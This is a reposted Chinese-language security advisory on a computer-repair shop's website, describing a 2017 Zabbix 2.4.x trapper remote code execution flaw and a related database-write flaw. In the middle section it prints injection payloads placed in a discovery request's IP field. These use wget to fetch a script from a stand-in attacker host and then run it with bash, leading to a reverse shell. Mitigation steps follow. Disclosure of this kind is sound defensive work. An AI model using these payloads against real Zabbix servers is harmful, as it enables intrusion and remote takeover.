锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务,锦州广厦维修电脑,公司IT外包服务
topFlag1 设为首页
topFlag3 收藏本站
 
maojin003 首 页 公司介绍 服务项目 服务报价 维修流程 IT外包服务 服务器维护 技术文章 常见故障
锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务技术文章
Zabbix爆远程代码执行漏洞、数据库写入高危漏洞

作者: 佚名  日期:2017-05-01 18:02:11   来源: 本站整理

 
关于Zabbix
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
漏洞描述
    Zabbix Server Active Proxy Trapper 远程代码执行漏洞 (CVE-2017-2824)★★★★
    Zabbix 2.4.x中的trapper command功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码,攻击者可以从一个Zabbix proxy 发起请求从而促发漏洞。
漏洞细节
该漏洞位于Zabbix中“Trapper”代码部分,它的主要功能是允许Proxy和Server进行通信的网络服务(TCP端口10051)Zabbix Server提供了一组针对Zabbix Proxy的API调用,两个将讨论的是“discovery data”和“request command”。这些请求的示例数据如下所示:
'{"request":"command","scriptid":1,"hostid":10001}'
'{"request":"discovery data","host":"zabbix-proxy.com","clock":10,
"data":[{"clock":10,"drule":1,"dcheck2,"type":0,"ip:10.0.0.1, "dns":"zabbix-agent.com",    port":10050,"key":"test","status":0,"value":"test_value"}]}
应该注意的是,request命令调用位于Zabbix数据库中的脚本,而不进行任何身份验证。该漏洞的另一个关键方面是,默认情况下,Zabbix 2.4.X使用脚本以下表中的3个脚本填充MySQL数据库:
# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1
问题在于,在调用脚本时,{HOST.CONN}字段实际上被host的IP地址替换。替换{HOST.CONN}的值位于Zabbixinterface表中,然后保存成VARCHAR(64)类型的“IP”字段。因此,如果攻击者可以使用命令注入创建接口作为IP地址,并且通过“命令”请求的方式运行{HOST.CONN}脚本,则将发生命令注入,并且可以获得反向shell。
这个难题在于有效地将值插入到Zabbixhost表。默认情况下,未经身份验证的攻击者无法做到这一点,它需要系统管理员的一个次要配置,特别是关于Zabbix自动发现功能。
Zabbix自动发现和自动注册功能允许根据Zabbix Proxy提供的Zabbix Server数据进行Zabbix Server的配置。更具体地说,如果主机根据服务器的配置向Zabbix Proxy提供某些特性,则可能会采取某些操作,其中一个会使新发现的主机被添加到某些Zabbix数据库表中。在这种情况下,主机将被插入到“host”表中,并且将创建一个入口到Zabbixinterface表中,主机提供的IP地址插入到IP列中,而不会对该IP地址的任何验证。
因此,通过使用合适的主机向服务器发送一个发现数据请求,可以将命令注入插入到数据库中:
 write_script_cmd='{
"request":"discoverydata",
"host":"zabbix-proxy.domain.fake",
"clock":148535399,
"data":[{
"clock":1485353070,
"drule":88,
"dcheck":174,
"type":0,
"ip":";wget -O/tmp/shttp://attacker-ip/s;#",
"dns":"host28.domain.fake",
"port":10050,
"key":"sectest",
"status":0,
"value":"lnxhost"
}]}'
由于ZabbixInterface表的ip字段的大小限制,第二个主机被插入到另一个IP地址的表中。
// Host 2
ip:/bin/bash /tmp/s;#
在这两个主机被添加之后,仍然有一个问题,即不知道该hostid的command请求,但是这很容易解决了。暴力请求入数据库,因为不同的命令请求会返回不同的响应,确定主机是否存在,一旦存在的主机被确定,就可以直接调用它们,并且可以获得反向的shell。命令请求如下所示
run_cmd = '{
"request":"command",
"scriptid":1,
"hostid":14666
}'
   
缓解措施
    删除Zabbix数据库中的默认脚本条目,可以直接操作数据库删除 sql 为: use zabbix; delete * from scripts;  ,也可使用图形界面删除 (Administration->Scripts->Checkmarks->Delete Selected).
    
    Zabbix Proxy 数据库写入漏洞(CVE-2017-2824)
    Zabbix 2.4.x中的trapper功能存在一处数据库写漏洞,特定的恶意trapper数据包可通过database 的逻辑检查,造成数据库写入,攻击者可通过中间人的方式修改zabbix  proxy 和 Server间的请求来触发漏洞。
影响版本   
 Zabbix 2.4.7 - 2.4.8r1
参考
http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html
http://www.talosintelligence.com/reports/TALOS-2017-0325/
http://www.talosintelligence.com/reports/TALOS-2017-0326/
https://support.zabbix.com/browse/ZBX-12075
https://support.zabbix.com/browse/ZBX-12076



热门文章
  • 机械革命S1 PRO-02 开机不显示 黑...
  • 联想ThinkPad NM-C641上电掉电点不...
  • 三星一体激光打印机SCX-4521F维修...
  • 通过串口命令查看EMMC擦写次数和判...
  • IIS 8 开启 GZIP压缩来减少网络请求...
  • 索尼kd-49x7500e背光一半暗且闪烁 ...
  • 楼宇对讲门禁读卡异常维修,读卡芯...
  • 新款海信电视机始终停留在开机界面...
  • 常见打印机清零步骤
  • 安装驱动时提示不包含数字签名的解...
  • 共享打印机需要密码的解决方法
  • 图解Windows 7系统快速共享打印机的...
  • 锦州广厦电脑上门维修

    报修电话:13840665804  QQ:174984393 (联系人:毛先生)   
    E-Mail:174984393@qq.com
    维修中心地址:锦州广厦电脑城
    ICP备案/许可证号:辽ICP备2023002984号-1
    上门服务区域: 辽宁锦州市区
    主要业务: 修电脑,电脑修理,电脑维护,上门维修电脑,黑屏蓝屏死机故障排除,无线上网设置,IT服务外包,局域网组建,ADSL共享上网,路由器设置,数据恢复,密码破解,光盘刻录制作等服务

    技术支持:微软等